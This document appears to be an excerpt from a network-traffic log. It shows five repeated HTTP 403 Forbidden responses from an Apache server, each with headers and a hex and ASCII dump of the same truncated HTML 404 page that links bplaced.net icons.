                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:51:04.210117102 CEST14644INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:04 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=110
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:51:05.125143051 CEST14652INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:05 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=106
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:51:06.233146906 CEST14660INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:06 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=101
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:51:07.268635988 CEST14668INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:07 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=109
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:51:08.284008026 CEST14675INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:08 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=79
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20 68
